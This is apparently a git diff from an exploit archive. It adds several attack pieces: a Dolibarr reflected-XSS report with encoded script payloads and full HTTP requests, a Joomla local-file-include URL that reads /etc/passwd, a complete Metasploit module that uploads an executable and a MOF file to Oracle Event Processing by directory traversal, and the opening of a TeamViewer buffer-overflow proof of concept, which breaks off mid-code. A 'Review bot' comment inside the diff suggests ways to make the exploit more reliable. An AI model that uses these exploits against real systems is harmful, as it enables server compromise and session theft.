+Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon
+Vulnerability Name: Cross-site scripting (reflected)
+
+Severity: Critical
+
+URL: http://localhost/dolibarr/user/fiche.php
+Affected Users: Authenticated user and admins
+
+Issue details: The value of the login request parameter is copied into the HTML document as plain text between tags. The payload 99ecb45a0d was submitted in the login parameter. This input was echoed unmodified in the application's response.
+
+This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
+HTTP request:
+POST /dolibarr/user/fiche.php?id=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit
+Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------89552749915619
+Content-Length: 2023
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="token"
+
+4e3018ee618da95bccb8c38845a4f027
+-----------------------------89552749915619
+Content-Disposition: form-data; name="action"
+
+update
+-----------------------------89552749915619
+Content-Disposition: form-data; 
name="entity"
+
+1
+-----------------------------89552749915619
+Content-Disposition: form-data; name="lastname"
+
+test
+-----------------------------89552749915619
+Content-Disposition: form-data; name="photo"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="firstname"
+
+test1
+-----------------------------89552749915619
+Content-Disposition: form-data; name="job"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="login"
+
+test99ecb45a0d
+-----------------------------89552749915619
+Content-Disposition: form-data; name="password"
+
+123qwe,./
+-----------------------------89552749915619
+Content-Disposition: form-data; name="admin"
+
+0
+-----------------------------89552749915619
+Content-Disposition: form-data; name="superadmin"
+
+0
+-----------------------------89552749915619
+Content-Disposition: form-data; name="office_phone"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="user_mobile"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="office_fax"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="email"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="signature"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="fk_user"
+
+-1
+-----------------------------89552749915619
+Content-Disposition: form-data; name="accountancy_code"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="save"
+
+Save
+-----------------------------89552749915619--
+
+Affected parameter(s): login
+
+Steps to replicate:
+25. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card".
+26. Click on modify to modify the user details
+27. Start any interception tool to intercept the request i.e. 
tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon.
+28. After starting tamper data addon, click on save to save the user details and intercept the request
+29. Manipulate login parameter value with payload 99ecb45a0d and submit the request and see the output in browser
+30. User logout inadequately and attack input was echoed unmodified in the application's response that is the proof of vulnerability
+
+Screenshot:
+
+Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
+• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
+• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
+In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
+Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. 
An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
+Tools used: Mozilla Firefox browser and Tamper Data Addon
+Vulnerability Name: Cross-site scripting (reflected)
+
+Severity: Critical
+
+URL: http://localhost/dolibarr/index.php
+Affected Users: All authenticated users
+
+Issue details: The value of the leftmenu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%33%38%31%37%29%3c%2f%73%43%72%49%70%54%3e was submitted in the leftmenu parameter. This input was echoed unmodified in the application's response.
+
+This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. 
+
+HTTP request:
+GET /dolibarr/index.php?mainmenu=home&leftmenu=%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%33%38%31%37%29%3c%2f%73%43%72%49%70%54%3e&optioncss=print HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:8082/dolibarr/index.php?mainmenu=home&leftmenu=
+Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55
+Connection: keep-alive
+
+Affected parameter(s): leftmenu
+
+
+
+
+
+Steps to replicate:
+31. Open Dolibarr application in browser.
+32. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon.
+33. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request
+34. Manipulate leftmenu parameter value with payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e
+or submit http://localhost/dolibarr/index.php?mainmenu=home&leftmenu=%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&optioncss=print in address bar and see the output in browser
+35. 
This input was echoed unmodified in the application's response that is the proof of vulnerability
+
+Screenshot:
+
+
+Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
+• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
+• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
+In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
+Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon
+?
+Vulnerability Name: Cross-site scripting (reflected)
+
+Severity: Critical
+
+URL: http://localhost/dolibarr/viewimage.php
+Affected Users: All authenticated users
+
+Issue details: The value of the modulepart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %3cscript%3ealert%2892207%29%3c%2fscript%3e was submitted in the modulepart parameter. This input was echoed unmodified in the application's response.
+
+This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
+
+HTTP request:
+GET /dolibarr/viewimage.php?modulepart=userphoto%3cscript%3ealert%2892207%29%3c%2fscript%3e&entity=1&file=2%2F0%2F1234&cache=0 HTTP/1.0
+Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: localhost
+Referer: http://localhost/dolibarr/user/fiche.php?id=2
+
+Affected parameter(s): modulepart
+
+Steps to replicate:
+36. Open Dolibarr application in browser.
+37. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon.
+38. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request
+39. Manipulate modulepart parameter value with payload %3cscript%3ealert%2892207%29%3c%2fscript%3e
+or submit http://localhost/dolibarr/viewimage.php?modulepart=userphoto%3cscript%3ealert%2892207%29%3c%2fscript%3e&entity=1&file=2%2F0%2F1234&cache=0 in address bar and see the output in browser
+40. 
This input was echoed unmodified in the application's response that is the proof of vulnerability
+
+Screenshot:
+
+
+Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
+• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
+• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
+In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
+Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon
+?
+Vulnerability Name: Cross-site scripting (reflected)
+
+Severity: Critical
+
+URL: http://localhost/dolibarr/viewimage.php
+Affected Users: All authenticated users
+
+Issue details: The value of the file request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e was submitted in the modulepart parameter. This input was echoed unmodified in the application's response.
+
+This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
+
+HTTP request:
+GET /dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e&cache=0 HTTP/1.0
+Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: localhost
+Referer: http://localhost/dolibarr/user/fiche.php?id=2
+
+Affected parameter(s): file
+
+Steps to replicate:
+41. Open Dolibarr application in browser.
+42. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon.
+43. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request
+44. Manipulate file parameter value with payload 2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e
+or submit http://localhost/dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e&cache=0 in address bar and see the output in browser
+45. 
This input was echoed unmodified in the application's response that is the proof of vulnerability
+
+Screenshot:
+
+
+Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
+• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
+• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
+In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
+Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon
+
+Below URLs are also vulnerable with XSS.
+
+Parameter URL
+dol_use_jmobile http://localhost/dolibarr/user/index.php
+dol_optimize_smallscreen http://localhost/dolibarr/user/index.php
+dol_no_mouse_hover http://localhost/dolibarr/user/index.php
+dol_hide_topmenu http://localhost/dolibarr/user/index.php
+dol_hide_leftmenu http://localhost/dolibarr/user/index.php
+dol_use_jmobile http://localhost/dolibarr/user/logout.php
+dol_optimize_smallscreen http://localhost/dolibarr/user/logout.php
+dol_no_mouse_hover http://localhost/dolibarr/user/logout.php
+dol_hide_topmenu http://localhost/dolibarr/user/logout.php
+dol_hide_leftmenu http://localhost/dolibarr/user/logout.php
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/34008.txt b/platforms/php/webapps/34008.txt
new file mode 100755
index 000000000..30d265acd
--- /dev/null
+++ b/platforms/php/webapps/34008.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40244/info
+
+Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+The following Percha components are affected:
+
+com_perchaimageattach
+com_perchafieldsattach
+com_perchadownloadsattach
+com_perchagallery
+com_perchacategoriestree
+
+http://www.example.com/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/windows/remote/33989.rb b/platforms/windows/remote/33989.rb
new file mode 100755
index 000000000..6176334d8
--- /dev/null
+++ b/platforms/windows/remote/33989.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::WbemExec
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Oracle Event Processing FileUploadServlet Arbitrary File Upload',
+ 'Description' => %q{
+ This module exploits an Arbitrary File Upload vulnerability in Oracle Event Processing
+ 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be
+ abused to upload a malicious file onto an arbitrary location due to a directory traversal
+ flaw, and compromise the server. By default Oracle Event Processing uses a Jetty
+ Application Server without JSP support, which limits the attack to WbemExec. The current
+ WbemExec technique only requires arbitrary write to the file system, but at the moment the
+ module only supports Windows 2003 SP2 or older. 
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability Discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-2424'],
+ ['ZDI', '14-106'],
+ ['BID', '66871'],
+ ['URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 5
+ },
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 2048
+ },
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Targets' =>
+ [
+ ['Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Apr 21 2014'))
+
+ register_options(
+ [
+ Opt::RPORT(9002),
+ # By default, uploads are stored in:
+ # C:\Oracle\Middleware\user_projects\domains\\defaultserver\upload\
+ OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+ ], self.class)
+ end
+
+ def upload(file_name, contents)
+ post_data = Rex::MIME::Message.new
+ post_data.add_part(rand_text_alpha(4 + rand(4)), nil, nil, "form-data; name=\"Filename\"")
+ post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"#{file_name}\"")
+ data = post_data.to_s
+
+ res = send_request_cgi({
+ 'uri' => '/wlevs/visualizer/upload',
+ 'method' => 'POST',
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+ 'data' => data
+ })
+
+ res
+ end
+
+ def traversal
+ "../" * datastore['DEPTH']
+ end
+
+ def exploit
+ print_status("#{peer} - Generating payload and mof file...")
+ mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
+ exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
+ exe_content = generate_payload_exe
+ mof_content = generate_mof(mof_name, exe_name)
+
+ print_status("#{peer} - Uploading the exe payload #{exe_name}...")
+ exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}"
+ res = upload(exe_traversal, exe_content)
+
+ unless res && res.code == 200 && res.body.blank? 
+ print_error("#{peer} - Unexpected answer, trying anyway...")
+ end
+ register_file_for_cleanup(exe_name)
+
+ print_status("#{peer} - Uploading the MOF file #{mof_name}")
+ mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}"
+ upload(mof_traversal, mof_content)
+ register_file_for_cleanup("wbem/mof/good/#{mof_name}")
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => '/ohw/help/state',
+ 'method' => 'GET',
+ 'vars_get' => {
+ 'navSetId' => 'cepvi',
+ 'navId' => '0',
+ 'destination' => ''
+ }
+ })
+
+ if res && res.code == 200
+ if res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)")
+ return Exploit::CheckCode::Detected
+ elsif res.body.to_s.include?("Oracle Event Processing 12")
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ Exploit::CheckCode::Unknown
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/remote/34002.c b/platforms/windows/remote/34002.c
new file mode 100755
index 000000000..caff3f1be
--- /dev/null
+++ b/platforms/windows/remote/34002.c
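Review bot: The return value of the second `upload(mof_traversal, mof_content)` call in `exploit` is discarded, so a rejected or failed MOF write is never reported, whereas the preceding exe upload is checked with `unless res && res.code == 200 && res.body.blank?`. For consistent status reporting, capture it as `res = upload(mof_traversal, mof_content)` and apply the same `unless … print_error` branch before `register_file_for_cleanup`. Separately, `check` returns `Detected` on the 11.1.1.7.0 banner alone, which says nothing about whether the April 2014 CPU fix listed under `References` has been applied; a comment such as `# Version banner only; does not confirm the upload servlet is unpatched` above the `include?` test would make that limitation explicit.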
@@ -0,0 +1,116 @@
+source: http://www.securityfocus.com/bid/40242/info
+
+TeamViewer is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can leverage this issue to execute arbitrary code within the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
+
+TeamViewer 5.0.8232 is vulnerable; other versions may be affected.
+
+#include
+#include
+#include
+#include
+#include
+
+#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
+#define POCNAME "[*]TeamViewer 5.0.8232 remote BOF poc(0day)"
+#define AUTHOR "[*]fl0 fl0w"
+
+ typedef int i32;
+ typedef char i8;
+ typedef short i16;
+ enum {
+ True=1,
+ False=0,
+ Error=-1
+ };
+ struct linger ling = {1,1};
+ i8* host;
+ i16 port;
+ i32 ver1,ver2,slen;
+ void syntax(){
+ i8 *help[]={"\t-h hostname",
+ "\t-p port(default 5938)",
+ };
+ i32 i;
+ size_t com=sizeof help / sizeof help[0];
+ for(i=0;i